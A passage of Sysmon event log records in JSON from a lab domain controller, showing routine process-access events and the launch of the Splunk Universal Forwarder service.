05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1663,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1664,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1665,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1666,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1667,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-00109C670300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.789\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-001081680300}\r\nProcessId: 3820\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nParentProcessId: 3808\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.789","ProcessGuid":"{A837DB8D-01C6-5F25-0000-001081680300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-00109C670300}","ParentProcessId":"3808","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nSourceProcessId: 3808\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-00109C670300}","SourceProcessId":"3808","SourceThreadId":"3812","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","TargetProcessId":"3820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 